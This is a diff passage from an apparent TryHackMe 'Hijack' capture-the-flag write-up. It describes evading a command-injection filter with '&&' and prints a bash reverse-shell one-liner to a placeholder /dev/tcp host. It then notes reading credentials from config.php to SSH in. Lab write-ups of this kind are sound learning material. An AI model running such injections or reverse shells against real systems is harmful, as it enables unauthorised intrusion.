LadyCaldlow/LadyCaldlow.github.io/content/thm/Hijack.md

 - While here, you can try to inject a command that gives you a reverse shell.
 I tried using a semi-colon after inputting ftp but the system detected this as a command injection.
 The other option is to use `&&` where the second commnad is executed only after the first is completed.
 With this, you can perform command injection as such to get a reverse shell;

-`ftp && bash -c "bash -i >& /dev/tcp/ip/port 0>&1"` where ip is your listening IP and port is your netcat listening port and executing this gives you a shell
+`ftp && bash -c "bash -i >& /dev/tcp/ip/port 0>&1"`
+  where ip is your listening IP and port is your netcat listening port and executing this gives you a shell.

 - Viewing the contents of `config.php` reveals credentials for the user rick which you can ssh into.
 - Now, you can get your first flag.